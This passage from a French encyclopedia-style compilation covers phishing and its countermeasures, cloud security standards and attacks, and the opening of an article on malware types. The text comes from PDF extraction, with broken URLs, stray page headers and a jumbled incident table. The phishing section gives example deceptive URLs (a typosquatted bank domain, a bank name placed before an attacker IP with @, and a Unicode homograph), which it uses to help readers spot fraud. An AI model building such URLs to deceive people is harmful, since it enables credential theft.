L’hameçonnage ou phishing (parfois appelé filoutage[1]) est une technique utilisée par des fraudeurs pour obtenir des renseignements personnels dans le but de perpétrer une usurpation d'identité. La technique consiste à faire croire à la victime qu'elle s'adresse à un tiers de confiance — banque, administration, etc. — afin de lui soutirer des renseignements personnels : mot de passe, numéro de carte de crédit, date de naissance, etc. C'est une forme d'attaque informatique reposant sur l'ingénierie sociale. Elle peut se faire par courrier électronique, par des sites web falsifiés ou autres moyens électroniques. Exemple de phishing. Lorsque cette technique utilise les SMS pour obtenir des renseignements personnels, elle s'appelle SMiShing (en)[2]. Hameçonnage 103

Sur Internet Les criminels informatiques utilisent généralement l'hameçonnage pour voler de l'argent. Les cibles les plus courantes sont les services bancaires en ligne, les fournisseurs d'accès Internet et les sites de ventes aux enchères tels qu'eBay et Paypal. Les adeptes de l'hameçonnage envoient habituellement des courriels à un grand nombre de victimes potentielles. Typiquement, les messages ainsi envoyés semblent émaner d'une société digne de confiance et sont formulés de manière à alarmer le destinataire afin qu'il effectue une action en conséquence. Une approche souvent utilisée est d'indiquer à la victime que son compte a été désactivé à cause d'un problème et que la réactivation ne sera possible qu'en cas d'action de sa part. Le message fournit alors un hyperlien qui dirige l'utilisateur vers une page Web qui ressemble à s'y méprendre au vrai site de la société digne de confiance. Arrivé sur cette page falsifiée, l'utilisateur est invité à saisir des informations confidentielles qui sont alors enregistrées par le criminel. En 2007, ces criminels informatiques ont changé de technique en utilisant un moyen de piratage appelé attaque de l'homme du milieu pour recueillir les informations confidentielles données par l'internaute sur le site visité. Il existe différentes variantes : • le spear phishing, qui vise une personne précise, par exemple sur des réseaux sociaux ; • l'in-session phishing, qui tente de récupérer la session utilisateur durant la navigation.

Parades

Vérification de l'orthographe du nom de domaine

La vérification de l'adresse web dans la barre d'adresse du navigateur web est la première parade. Ainsi, une attaque simple consiste à utiliser un nom de domaine très proche (par exemple avec une faute

grammaticale ou orthographique), comme http:/ / www. societegeneral.

fr/ au lieu de http:/ / www. societegenerale. fr/ . L'attaquant aura préalablement acheté un nom de domaine proche de l'original, généralement une variante orthographique.

Vérification de l'absence d'arobase dans l'URL

Dans les années 90 et au début des années 2000, une méthode très utilisée était la possibilité de laisser au sein de l'URL le nom Exemple d’hameçonnage pour obtenir l'accès à un compte webmail à fin de Spam. La syntaxe d'utilisateur et le mot de passe dans le cadre d'une authentification défaillante et le caractère inadéquat de l'adresse

HTTP. L'URL prend alors la forme http:/ / login:motdepasse@www. Web proposée dans le corps du message sont

domaine. tld. susceptibles d'éveiller les soupçons. À la même époque, il était fréquent que les URLs comportent une longue chaîne de caractère pour identifier la session de l'utilisateur. Par exemple, une telle URL pouvait ressembler à

http:/ / www. domaine. tld/ my. cnf?id=56452575711& res=lorem-ipsum-dolor& quux=2& lang=fr& sessid=jP3ie3qjSebbZRsC0c9dpcLVe2cAh0sCza3jcX7mSuRzwY4N0v1DBB71DMKNkbS Les attaquants concevaient dès lors d'une URL ressemblant à la seconde, en écrivant le nom de domaine usurpé comme login. Par exemple, pour convaincre l'utilisateur que le site qu'il visite est bien www.societegenerale.fr, et

que l'adresse IP du serveur de l'attaquant est 88.132.11.17, l'URL pouvait être http:/ / www. societegenerale. fr/

espaceclient:id=56452575711& res=lorem-ipsum-dolor& quux=2&

lang=frsessid=jP3ie3qjSebbZRsC0c9dpcLVe2cAh0sCza3jcX7mSuRzwY4N0v1DBB71DMKNkbS@88. 132. 11. 17. Hameçonnage 104

Suite à cette technique d'hameçonnage, les navigateurs avertissent de la manœuvre. Ainsi, dans le cas précédent, le navigateur Firefox proposerait le message suivant : Vous êtes sur le point de vous connecter au site « 88.132.11.17 » avec le nom d'utilisateur « a », mais ce site web ne nécessite pas d'authentification. Il peut s'agir d'une tentative pour vous induire en erreur. « 88.132.11.17 » est-il bien le site que vous voulez visiter ? Cette technique est donc aujourd'hui minoritaire.

Vérifier l'absence de caractères Unicode Une méthode plus élaborée pour masquer le nom de domaine réel consiste à utiliser des caractères bien choisis parmi les dizaines de milliers de caractères du répertoire Unicode[3]. En effet, certains caractères spéciaux ont l'apparence

des caractères de l'alphabet latin. Ainsi, l'adresse web http:/ / www. pаypal. com/ a la même apparence que http:/ / [4] www. paypal. com/ , mais est pourtant bien différente . Une contre-mesure à cette attaque est de ne pas permettre l'affichage des caractères hors du répertoire ASCII, qui ne contient que les lettres de A à Z, les chiffres et de la ponctuation. Cette dernière contre-mesure est cependant difficilement compatible avec l'internationalisation des noms de domaine, qui requiert le jeu de caractères Unicode.

Vérifier les certificats électroniques Il existe depuis les années 1990 une parade technique à l'hameçonnage : le certificat électronique. Toutefois, l'interface utilisateur des navigateurs Web a longtemps rendu les certificats incompréhensibles pour les visiteurs. Cette interface était connue sous les traits d'un petit cadenas. Il était simplement expliqué au grand public que le cadenas signifie que la communication est chiffrée, ce qui est vrai, mais ne protège aucunement contre l'hameçonnage. Dans les années 2000, des certificats étendus ont été inventés. Ils permettent d'afficher plus clairement l'identité vérifiée d'un site.

Écrire manuellement les URLs Une personne contactée au sujet d'un compte devant être « vérifié » doit chercher à régler le problème directement avec la société concernée ou se rendre sur le site web en tapant manuellement l'adresse dans son navigateur. Il faut savoir que les sociétés bancaires n'utilisent jamais le courriel pour corriger un problème de sécurité avec leurs clients. En règle générale, il est recommandé de faire suivre le message suspect à la société concernée[5], ce qui lui permettra de faire une enquête.

Autres parades Les filtres anti-spam aident aussi à protéger l’utilisateur des criminels informatiques en réduisant le nombre de courriels que les utilisateurs reçoivent et qui peuvent être de l'hameçonnage. Le logiciel client de messagerie Mozilla Thunderbird comporte un filtre bayésien très performant (filtre anti-spam auto-adaptatif). Les fraudes concernant les banques en ligne visent à obtenir l'identifiant et le mot de passe du titulaire d'un compte. Il est alors possible au fraudeur de se connecter sur le site web de la banque et d'effectuer des virements de fonds vers son propre compte. Pour parer à ce type de fraude, la plupart des sites bancaires en ligne n'autorisent plus l'internaute à saisir lui-même le compte destinataire du virement[réf. nécessaire] : il faut, en règle générale, téléphoner à un service de la banque qui reste seul habilité à saisir le compte destinataire dans une liste de comptes. La conversation téléphonique est souvent enregistrée et peut alors servir de preuve[réf. nécessaire]. D'autres banques utilisent une identification renforcée, qui verrouille l'accès aux virements si l'utilisateur n'indique pas la bonne clé à huit chiffres demandée aléatoirement, parmi les soixante-quatre qu'il possède. Si la clé est la bonne, l'internaute peut effectuer des virements en ligne. Hameçonnage 105

En France, les internautes sont invités à communiquer avec la cellule de veille de la police nationale pour témoigner de leurs propres (mauvaises) expériences ou leur envoyer des liens conduisant à des sites qu'ils jugent contraires aux lois. Ils ont pour cela à leur disposition un site internet dédié[6]. Pour aider les internautes à se protéger contre ces fraudes, l'association à but non lucratif Phishing Initiative a été créée en 2010 : elle permet à tout internaute de reporter les sites frauduleux francophones pour les faire bloquer.

Exemple Les attaques par hameçonnage sont le plus souvent dirigées vers les sites sensibles tels que les sites bancaires. Les sites de réseaux sociaux sont aujourd'hui également la cible de ces attaques. Les profils des utilisateurs des réseaux sociaux contiennent de nombreux éléments privés qui permettent aux pirates informatiques de s'insérer dans la vie des personnes ciblées et de réussir à récupérer des informations sensibles[7].

Terminologie « Hameçonnage » est un néologisme québécois créé en avril 2004 par l'Office québécois de la langue française[8]. En France, la Commission générale de terminologie et de néologie a choisi « filoutage » en 2006[1]. Le terme phishing est une variante orthographique du mot anglais fishing[9], il s'agit d'une variation orthographique du même type que le terme phreaking (f remplacé par ph). Il aurait été inventé par les « pirates » qui essayaient de voler des comptes AOL et serait construit sur l'expression anglaise password harvesting fishing, soit « pêche aux mots de passe »[réf. nécessaire] : un attaquant se faisait passer pour un membre de l'équipe AOL et envoyait un message instantané à une victime potentielle. Ce message demandait à la victime d'indiquer son mot de passe, afin de, par exemple, « vérifier son compte AOL » ou « confirmer ses informations bancaires ». Une fois que la victime avait révélé son mot de passe, l'attaquant pouvait accéder au compte et l'utiliser à des fins malveillantes, comme l'envoi de spam.

Notes et références

[1] Avis de la Commission générale de terminologie et de néologie : Vocabulaire de l'économie et du tourisme (http:/ / legifrance. gouv. fr/

affichTexte. do?categorieLien=id& cidTexte=JORFTEXT000000426018), JORF 37 du 12 février 2006, 2239, texte 43, NOR CTNX0609037K, sur Légifrance.

[2] Définition Smishing (http:/ / www. definitions-webmarketing. com/ Definition-Smishing)

[3] The state of homograph attacks, Rev 1.1 (http:/ / www. shmoo. com/ idn/ homograph. txt) [4][4]Les adresses internet correspondant à ces liens apparaissent en bas de votre navigateur quand vous les survolez à la souris. [5] si l’hameçonnage concerne societe.com, il faut faire suivre le mail à l'adresse UNIQ-nowiki-0-8b409347dacf5ca1-QINU ou UNIQ-nowiki-1-8b409347dacf5ca1-QINU

[6] https:/ / www. internet-signalement. gouv. fr

[7] http:/ / blogs. orange-business. com/ cgi-bin/ mt/ mt-search. cgi?blog_id=2& tag=reseaux%20sociaux& limit=20 [8][8]:

[9] http:/ / www. pcworld. com/ article/ 113431/ spam_slayer_do_you_speak_spam. html 106

2.7-Cloud Computing

Sécurité du cloud

La sécurité du cloud (Cloud Security en anglais) est un sous domaine du cloud computing (Informatique dans les nuages) en relation avec la sécurité informatique. Elle implique des concepts tels que la sécurité des réseaux, du matériel et les stratégies de contrôle déployées afin de protéger les données, les applications et l'infrastructure associée au cloud computing. Un aspect important du cloud est la notion d'interconnexion avec divers matériels qui rend difficile et nécessaire la sécurisation de ces environnements. Un problème de sécurité dans une plateforme sur le cloud peut engendrer une perte économique mais également une mauvaise réputation si toutefois cette plateforme est orientée grand public. Les problèmes de sécurité du cloud sont la cause du retard de l'adoption massive de cette nouvelle solution[]. Carte du cloud computing

La sécurité dans le cloud

L'utilisation de plus en plus fréquente du cloud computing fait apparaître de nouveaux risques de sécurité. Augmentant ainsi l'intérêt des criminels à trouver de nouvelles vulnérabilités et exposant les utilisateurs à voir leurs données compromises[]. Pour atténuer cette menace, les intervenants du cloud devraient investir massivement dans l'évaluation des risques informatiques afin de s'assurer que les données sont bien protégées. Etablir des bases fiables et des normes pour sécuriser leur infrastructure. Tout ceci afin d'établir la confiance dans cette nouvelle technologie qu'est le cloud computing[].

En 2009, le groupe "cloud security alliance" a été formé pour promouvoir les bons usages en matière de sécurité dans le milieu du Modéles de sécurité du cloud cloud. Depuis ce groupe compte 40.000 membres.

La sécurité des données La non-interopérabilité des fournisseurs Un client peut éprouver le besoin de changer de fournisseur de cloud. Celui ci ne peut aujourd'hui pas effectuer un transfert de stockage directement de son fournisseur vers un autre. Néanmoins, la norme CDMI (Cloud Data Management Interface) décrit un format d'échange qui permet de déplacer les données d'un environnement cloud vers un autre. []. Le chiffrement dans le cloud Le client peut utiliser le chiffrement des données pour le stockage dans le cloud, mais il reste à définir qui doit contrôler les clés de chiffrement et de déchiffrement. En toute logique, ceci doit être géré par le client[]. Sécurité du cloud 107

L'intégrité des données Dans le cloud, il est nécessaire d'assurer l'intégrité des données pendant un transfert ou un stockage. Il faut donc que les opérations sur les données soient contrôlées afin de n'effectuer que les opérations qui sont autorisées. Il n'existe actuellement pas de standard commun entre les fournisseurs de cloud[]. La gestion des logs Dans le respect du Payment Card Industry Data Security Standard (PCI DSS), les logs doivent être fournis au gestionnaire de sécurité[]. Le stockage Les données peuvent être transférées entre plusieurs datacenter géographiquement éloignés. Le particulier ou l'entreprise ne connait pas la position des données entre chaque datacenter[1]. La confidentialité Le propriétaire des données doit savoir quelles informations sont gardées et dans certains cas être capable de demander leur suppression. Pour ce qui est du paiement sécurisé ou Payment Card Industry Data Security Standard (PCI DSS), les données bancaires et la trace des transactions doivent pouvoir être transférées aux autorités et personnes chargées des régulations[].

La sécurité des infrastructures La sécurité physique La sécurité physique est rompue avec le modèle du cloud, cause de la notion de partage de ressources et de virtualisation. Une machine physique partage ces ressources avec les différentes machines virtuelles qu'elle héberge et ceci indépendamment du client de la machine[]. Il revient logiquement au fournisseur de choisir ou mettre en place sont architecture et quel sécurité physique est déployé, mais aussi protéger et documenter l’actes au donnée utilisateur. L'audit Le fournisseur de cloud doit être audité sur la sécurité de ses infrastructures et des ses solutions par une société externe ou passer acquérir une certification[]. Les mises à jour Afin de bénéficier des mises à jour de sécurité sur les produits qui sont installés ou utilisés sur l'infrastructure cloud, le client doit s'assurer d'effectuer régulièrement les mises à jour[]. Test de sécurité de l'image de base Le cloud est basé sur la virtualisation, ceci permet au fournisseur de créer une image de base sécurisée et à jour afin de déployer à la demande d'un client une machine ou un service[]. Elle permet au fournisseur de mettre en place des patchs de sécurité mais également de tester les impacts de l'installation de celui ci[].

La justice et le cloud La sécurité de la localisation des données Dans le cloud, les données d'un particulier ou d'une entreprise sont hébergées chez le fournisseur. Les lois concernant le transfert de données personnelles ainsi que la conservation des données peuvent différer d'un pays à l'autre[]. Dans le cas où des données violent la loi de l’État où elles résident il y a un risque potentiel de saisie par le gouvernement [] La confidentialité des données Le client doit connaître l'utilisation de ses données et pouvoir faire valoir ce droit de confidentialité devant la justice afin que le fournisseur justifie de l'utilisation de ses données[]. Sécurité du cloud 108

Les données confidentielles • Toute information permettant d'identifier un individu[]. • Toute information récoltée par le biais d'un ordinateur personnel[]. • Toute information permettant la localisation d'un périphérique personnel[]. • Toute information personnelle d'un individu[].

L'isolation Le cloud computing introduit le partage de ressources, ce qui peut potentiellement mener à des attaques de type Attaque par canal auxiliaire (écoute passive d'informations) ou Canal caché (envoi d'informations) entre différentes machines virtuelles évoluant dans le même environnement[]. Le problème d'isolation réside dans le fait que l’environnement (machine virtuelle) d'un attaquant peut potentiellement se retrouver sur la même machine physique d'un utilisateur cause que cette dernière héberge de multiples machines virtuelles. Cela lui permet de mettre en place différentes attaques matérielles ou logicielles pour écouter ou perturber les autres machines virtuelles[],[2].

La virtualisation et la sécurité dans le cloud La virtualisation est liée au cloud computing. En effet, le fournisseur de cloud propose à ces clients d'acquérir son propre serveur autrement dit sa propre Machine Virtuelle. Le fournisseur de cloud, propose ce service sans prendre connaissance du Système d'exploitation installé sur cette machine virtuelle, ni de la configuration de celui ci. Néanmoins, ce dernier propose un système de sécurité comme service (Security as a service) basé sur l'introspection des machines virtuelle[]. L'introspection des machines virtuelles pour la sécurité Pour assurer la sécurité des ressources des machines virtuelles, il existe un composant permettant de contrôler la mémoire, le disque virtuel et le système d'exploitation installé sur celle ci. Ce composant est basé sur l'introspection de la machine virtuelle (VMI).Un exemple d'un tel composant est Xen Access. Il permet de contrôler que les ressources sont sécurisées et qu'il n'y a à pas eu d'intrusion avant le démarrage de la machine virtuelle[]. La protection de la mémoire Une machine virtuelle peut subir une attaque basée sur la modification de la mémoire. L'attaquant peut soit y introduire un Rootkit ou des données dans les zones protégées de celle ci[]. Quelques implémentations de protection pour la mémoire: • CoPilot (Un Noyau de système d'exploitation basé sur le contrôle d'intégrité et la détection des modifications illégales d'un noyau Linux)[]. • Paladin (Un composant qui utilise la virtualisation pour la détection et le contrôle d'une attaque par Rootkit)[]. • Xenkimono (Un composant qui détecte les violations des règles de sécurité en utilisant l'introspection de la machine virtuelle (VMI).Il implémente un contrôle d'intégrité, pour détecter la modification du code du noyau système)[]. • SecVisor (Un petit Hyperviseur qui assure que le code exécuté par le noyau système est approuvé par l'utilisateur. Il utilise pour cela la virtualisation de la mémoire physique)[]. La sécurisation de l'exécution de code La sécurisation de l'exécution de code dans le noyau permet de prévoir les exécutions malveillantes. Un exemple de système permettant de contourner ce problème et d'assurer la protection de l'exécution de code est Manitou. Ce système utilise le moniteur de mémoire virtuelle (VMM) afin de calculer un Hash sur chaque page mémoire et de vérifier avant l'exécution du code si le hash est dans la liste des hash autorisés[]. La sécurité des flux de données Sécurité du cloud 109

Une attaque sur les machines virtuelles peut agir sur des flux de données par exemple. C'est pour cela que la mise en place de système de contrôle et d'intégrité doit permettre d'éviter la modification des flux de donnée. Lares est un exemple de composant permettant via l'introduction d'un outil sur le système d'exploitation cible, de vérifier si la machine virtuelle est sécurisée. Il utilise pour cela la vérification des règles de sécurité et l'introspection de la machine virtuelle (VMI)[].

Les normes dans le cloud

Normes ISO Il n'y a pour le moment pas de norme ISO standardisant explicitement le cloud[]. Cette prochaine norme est en cours de création et permettra de standardiser le cloud de manière à rendre disponible une API unique pour l'utilisation de plusieurs fournisseurs de cloud mais également définir la sécurité requise pour le cloud. Néanmoins, les fournisseurs de cloud concrétisent leur niveau de sécurité en obtenant des normes sur la sécurité de l'information applicables en partie sur le cloud[]. Ces normes sont exposées ci-dessous.

ISO 27001/27002 ISO 27001 La norme ISO 27001 est une norme reconnue à l'échelle internationale pour l'évaluation de la sécurité des environnements informatiques[]. Cette norme concernant la sécurité de l'information est basée sur les méthodes de gestion de la sécurisation de l'information, la confidentialité, l'intégrité et la disponibilité[].

ISO 7498-2 La Norme ISO 7498-2 définit l'exigence en termes de sécurité sur des thèmes comme : l'identification, les autorisations, la confidentialité, la disponibilité, l'intégrité et la non-repudiation[]. La sécurité du cloud peut être guidée par cette norme afin d'être efficace et sécurisée[].

SLA (Service Level Agreement) Article principal : Service Level Agreement. La sécurité dans le cloud peut être définie dans le Service Level Agreement (SLA), afin de prévenir et garantir les niveaux de sécurité pour chaque service[]. Le prestataire ou le fournisseur de cloud La société proposant une offre cloud. Le client Le particulier ou la société qui investit dans une offre cloud afin d'y héberger des données potentiellement confidentielles ou personnelles. Le Service Level Agreement (ou SLA) permet de définir la sécurité mise en place contre les attaques malveillantes et les pannes éventuelles, entre le prestataire et le client[]. Ce document est important pour les 2 parties, s'il est utilisé correctement il permet de[] : •• Identifier et définir les besoins du client •• Fournir un cadre pour la compréhension •• Simplifier les questions complexes •• Réduire les zones de conflit •• Encourager le dialogue en cas de conflit •• Éliminer les espérances peu réalistes Sécurité du cloud 110

Le SLA et le cloud aujourd'hui Le SLA n'est pas adapté pour la cloud computing cause de son architecture bien différente des systèmes informatiques précédents[]. En effet, le cloud est basé sur une architecture centralisée dans des centres de traitements de données qui sont exposés sur internet[]. Le SLA aujourd'hui sauf dans des cas bien particulier, garantie les termes suivants : Réclamation au fournisseur suite à une panne Le client doit ouvrir un ticket au support en saisissant les informations nécessaires spécifiées dans le SLA[]. Réclamation au fournisseur suite à une faute du client Le client peut être pénalisé financièrement ou son compte peut être bloqué si un problème survient et le met en cause. Ceci est une cause de violation du contrat et permet de prévoir des attaques ou autres actions provenant de l'infrastructure du client[]. Réseau Privé Le fournisseur garanti 99,9 % de disponibilité du réseau privé entre le datacenter et le client. Ceci inclut la mise en place et sécurisation d'un VPN, la bande passante maximale possible et les outils d'analyses du trafic sur le réseau[]. Réseau Public Le fournisseur garanti 99,9 % de disponibilité du réseau public (internet), avec des redondances sur les connexions[]. La redondance des infrastructures Le fournisseur garantie 99,9 % de disponibilité des infrastructures et des services[]. Le changement de matériel Pour répondre à la demande du client ou un besoin de maintenance de l'infrastructure, des changements de matériels peuvent être nécessaires. Ces changements doivent être planifiés et si ce changement n'est pas possible, une pénalité sera appliquée au fournisseur[].

La standardisation du SLA Pour garantir un niveau de sécurité, le SLA doit définir les méthodes utilisées pour maintenir et garantir la sécurité de l'infrastructure cloud qui sera utilisée par le client. Les termes en discussions pour la standardisation du SLA sont listés ci-dessous[],[]: Accès d'utilisateur privilégié Les administrateurs ont un accès global aux informations, il est nécessaire de définir les administrateurs habilités à intervenir sur les infrastructures du client dans le cadre de la confidentialité des données d'un entreprise[],[]. Conformité règlementaire Le client est responsable de la sécurité et l'intégrité de ces données. Pour cela, le fournisseur de cloud fournis les services et outils nécessaires au bon déroulement de ces tâches. Le prestataire traditionnel est soumis à des audits et des certifications. Les fournisseurs de cloud qui refusent ces audits doivent le signaler aux clients et spécifier que le client ne peut qu'utiliser les fonctions les plus insignifiantes [],[]. L'emplacement des données Dans le cloud, une notion de localisation des données est difficile à acquérir. En effet, un fournisseur de cloud dispose de plusieurs datacenter à travers le monde et dans des pays différents. C'est pour cela qu'il est nécessaire que le client prennent connaissance de la localisation de ces données, car celle ci peuvent être stockées dans des pays ou les lois de confidentialité des données sont différentes[],[]. Sécurité du cloud 111

Ségrégation de données Les données dans le cloud sont présentes sur plusieurs centres de données afin que le fournisseur de cloud puisse garantir un service de haute disponibilité à son client. La sécurisation des données grâce au chiffrement est nécessaire pour la transmission de celle ci vers les différents centres de données. Le client doit prendre connaissance de la méthode de chiffrement ainsi que la méthode utilisée pour le transfert approuvée par un spécialiste[],[]. La restauration Le client doit connaitre le niveau de service en termes de restauration des données. Les fournisseurs ne sont pas dans l'obligation de répliquer les données du client. Dans le cas ou l'infrastructure utilisée par le client subirai une défaillance, celui ci pourrait perdre une partie ou la totalité de ces données si toutefois le fournisseurs n'inclut pas dans son offre la réplication ou la sauvegarde des données[],[]. Le support La surveillance des activités illégale sur les interfaces du cloud est très difficile.La raison de cette difficulté est la centralisation des infrastructures qui engendre plusieurs clients sur un même serveur, la localisation des datacenters. Il est donc très difficile pour le fournisseur de détecter et bloquer les utilisations malveillantes des infrastructures. Cette information doit être spécifiée au client afin que celui ci soit vigilant[],[]. L'efficacité Il est nécessaire pour le client d'avoir des informations sur l'infrastructure du fournisseur et des garanties quant à la fiabilité de ces solutions. Le client externalisant ces infrastructures chez un fournisseur de cloud a besoin de garanties sur ces applications et ces données afin d'être sur que celui ci ne subissent pas des pertes suite à une panne[],[].

Les attaques et l'impact sur le cloud Les composants de sécurité tel que les pare feu ou les systèmes de détection d'intrusion, ne sont pas adaptés pour détecter les attaques distribuées[].Ces attaques sont donc subdivisées en sous attaques afin d'être indétectable par de tel système de sécurité[].

Balayage de port L'attaque par Balayage de port permet à celui-ci de découvrir des ports de communication exploitables. Cette attaque peut être évitée grâce à des systèmes de sécurité comme un Pare-feu (informatique) ou encore un Système de détection d'intrusion ((en) IDS: Intrusion System Detection)[]. Les infrastructures du cloud sont sensibles à ce type d'attaque si celle-ci est effectuée en parallèle[]. Un système tel que l'IDS analyse une partie du trafic et ne détecte donc pas une attaque par scan de port si celle ci est effectuée avec différents scanner[]. Les solutions de sécurité actuelle ne sont pas adaptées pour ce type d'attaque sur une telle infrastructure[].

Déni De Service L'Attaque par déni de service à pour but de rendre un service indisponible par une surcharge réseau par exemple. Le fournisseur doit mettre en œuvre les solutions contre ces attaques[].Cette attaque peut être évitée grâce à la scalabilité du cloud. Des services comme Amazon permettent dynamiquement de mettre d'avantage de ressources ou d'instances suivant le besoin[]. Néanmoins, les clients n'utilisant pas les services de scalabilité sont soumis aux risques de ces attaques, il est dans ce cas difficile de détecter ces attaques pour les bloquer cause du potentiel nombre d'attaques simultanées[]. Sécurité du cloud 112

L'exploitation de bogue logiciel Le client et le fournisseur doivent s'assurer que les logiciels qu'ils utilisent sont à jour afin d'éviter l'exploitation des bogues logiciels. Cette action ne permet pas de les éviter mais de limiter les risques[].

Attaque de l'homme du milieu L'Attaque de l'homme du milieu est dans le but d'intercepter les communications entre un client et un serveur afin de consulter, capturer et contrôler la communication en toute transparence[].

Analyseur de paquets L'Analyseur de paquets est une application ou un périphérique qui permet de lire, capturer les données qu transitent sur un réseau. Cette attaque permet à l'attaquant de récupérer les données puis les lire[].

Attaque par injection de maliciel cloud Le principe de cette attaque est d'injecter sur une des plateforme du cloud (Saas, Iaas, Paas) du code malicieux afin de compromettre l'infrastructure victime[].

L'impact de la sécurité du cloud sur l'économie

L'impact des attaques distribuées Les attaques distribuées tel qu'un déni de service à un impact économique pour le client[]. Cette attaque peut être contrée grâce à la scalabilité du cloud et donc engendrer des coût supplémentaire pour le client[]. Dans le cas ou le client n'a pas mis ce type de solution en place, il risque que son infrastructure soit hors service et donc des pertes de bénéfices pour celui ci[].

Avantages économiques La mutualisation du matériel permet d'optimiser les coûts par rapport aux systèmes conventionnels (afin de réaliser des économies) et de développer des applications partagées sans avoir besoin de posséder ou de louer chez un hébergeur ses propres serveurs. Cela évite aussi toute maintenance des machines. Ces avantages peuvent pousser a l'utilisation du cloud computing et rendre acceptable une prise de risque plus forte.

La faillite Si un fournisseur tombe en faillite, le client perd l'accès à ces applications et ses données car l'infrastructure du fournisseur passe hors ligne. Les données du fournisseur ne sont donc pas récupérables et deviennent la propriété du créancier du fournisseur de cloud[]. Cette situation peut entrainer la faillite du client si toutefois celui ci est une entreprise et que les données qui étaient hébergées chez le fournisseur soient sensibles et indispensables pour l'entreprise. Sécurité du cloud 113

Facturation trompeuse Le système de paiement aux ressources consommées peut engendrer une surfacturation de la part du fournisseur pour des ressources allouées mais non consommées[]. Cette surfacturation est une perte pour le client.

Historique des attaques dans le cloud

Victime Date Type d'attaque Description

Dropbox Octobre Analyse du client Analyse du client Dropbox et démonstration de vulnérabilités exploitables localement et à distance. 2012 Dropbox [3]

Epsilon Mars Hameçonnage par Récupération des noms et email de plus de 20 entreprises clientes de la société Epsilon. 2012 email

Dropbox Juin Vol de mot de Vol de mot de passe de compte Dropbox d'un employé et récupération d'informations concernant un 2012 passe et ingénierie projet confidentiel. Menant a une large campagne de spam. sociale

Rackspace Juin Prédiction de mot Plusieurs failles de sécurité ont permise de prédire ou modifier le mot de passe administrateur de 2012 de passe compte rackspace. [4] administrateur

iCloud Août Vol de mot de Un journaliste possédant un compte iCloud a été victime du vol de plusieurs de ses comptes y 2012 passe et ingénierie compris l'effacement de ses données sur des périphériques Apple en utilisant iCloud. sociale

CloudFlare Mai Exploitation d'une AT & T trompés en redirigeant un message vocal à une boîte vocale frauduleuse. Processus de 2012 vulnérabilité récupération de compte Google a été exploité par la boîte vocale frauduleuse, ce qui permet Google d'atteindre des craquelins Gmail PIN de récupération de compte, et pour réinitialiser le compte Gmail. Apps/Gmail Une vulnérabilité dans le processus de récupération de Google Enterprise Applications qui a permis aux pirates de contourner l'authentification à deux facteurs de l'adresse URL utilisateur CloudFlare.com. Vulnérabilités BCCing CloudFlare a permis aux cybercriminels pour réinitialiser un mot de passe client une fois qu'ils avaient eu accès à un compte de messagerie administrative.

PlayStation Avril Injection SQL Le service PlayStation Network de sony victime d'une attaque par injection sql et exploitation d'un Network 2011 défaut de chiffrement des données utilisateurs du PSN, obligeant la société à arrêter complètement son réseau en ligne de jeux vidéo et PlayStation Store.

VMWARE Juin Exécution de code CLOUDBURST A VMware Guest to Host Escape Story [5] 2009 à l’extérieur du VMWARE Guest

Notes et références

[1][1]Centre de traitement de données (datacenter en anglais)

[2] http:/ / fr. wikipedia. org/ wiki/ Fuite_d%27informations_dans_les_environnements_virtualis%C3%A9s

[3] http:/ / archive. hack. lu/ 2012/ Dropbox%20security. pdf

[4] http:/ / mesoscale-convective-vortex. blogspot. fr/ 2012/ 06/ multiple-rackspace-security. html

[5] http:/ / www. blackhat. com/ presentations/ bh-usa-09/ KORTCHINSKY/ BHUSA09-Kortchinsky-Cloudburst-SLIDES. pdf 114

3-Logiciel malveillant

Logiciel malveillant

Un logiciel malveillant (en anglais, malware) est un programme développé dans le but de nuire à un système informatique, sans le consentement de l'utilisateur infecté. De nos jours, le terme virus est souvent employé, à tort, pour désigner toutes sortes de logiciels malveillants. En effet, les malwares englobent les virus, les vers, les chevaux de Troie, ainsi que d'autres menaces. La catégorie des virus informatiques, qui a longtemps été la plus répandue, a cédé sa place aux chevaux de Troie en 2005. Le terme Logiciel malveillant, dont l'usage est préconisé par la commission générale de terminologie et de néologie en France, est une traduction du mot anglais malware, qui est une contraction de malicious (qui signifie malveillant, et non malicieux) et software (logiciel). Dans les pays francophones, l'utilisation de l'anglicisme malware est le plus répandu ; le mot maliciel est bien souvent utilisé au Québec[1], mais il n'est pas reconnu par le GDT[2].

Classification Les logiciels malveillants peuvent être classés en fonction des trois mécanismes suivants : • le mécanisme de propagation (par exemple, un ver se propage sur un réseau informatique en exploitant une faille applicative ou humaine) ; • le mécanisme de déclenchement (par exemple, la bombe logique — comme la bombe logique surnommée vendredi 13 — se déclenche lorsqu'un évènement survient) ; • la charge utile (par exemple, le virus Tchernobyl tente de supprimer des parties importantes du BIOS, ce qui bloque le démarrage de l'ordinateur infecté). La classification n'est pas parfaite, et la différence entre les classes n'est pas toujours évidente. Cependant, c'est aujourd'hui la classification standard la plus couramment adoptée dans les milieux internationaux de la sécurité informatique. Dans une publication[], J. Rutkowska propose une taxonomie qui distingue les malwares suivant leur mode de corruption du noyau du système d'exploitation : ne touche pas au noyau (ie, applications, micrologiciel), corruption d'éléments fixes (code), corruption d'éléments dynamiques (données) et au-dessus du noyau (hyperviseurs).

Les virus Les virus sont capables de se répliquer, puis de se propager à d'autres ordinateurs en s'insérant dans d'autres programmes ou des documents légitimes appelés « hôtes ». Ils se répartissent ainsi : virus de secteur d'amorçage ; de fichier ; de macro ; et de script. Certains intègrent des rootkits. Les virus peuvent s'avérer particulièrement dangereux et endommager plus ou moins gravement les machines infectées.

Les vers Les vers (worm) sont capables d'envoyer une copie d'eux-mêmes à d'autres machines. Ils peuvent être classés selon leur technique de propagation : les vers de courrier électronique ; Internet ; IRC ; les vers de réseau ; et ceux de partage de fichiers. Certains, comme le ver I Love You, ont connu une expansion fulgurante. Logiciel malveillant 115

Les chevaux de Troie Les chevaux de Troie (Trojan horse) sont divisés en plusieurs sous-catégories, et comprennent notamment les portes dérobées, les droppers, les notificateurs, les logiciels espions (dont les keyloggers) etc. Ils ont chacun des objectifs spécifiques. Certains chevaux de Troie utilisent également des rootkits pour dissimuler leur activité.

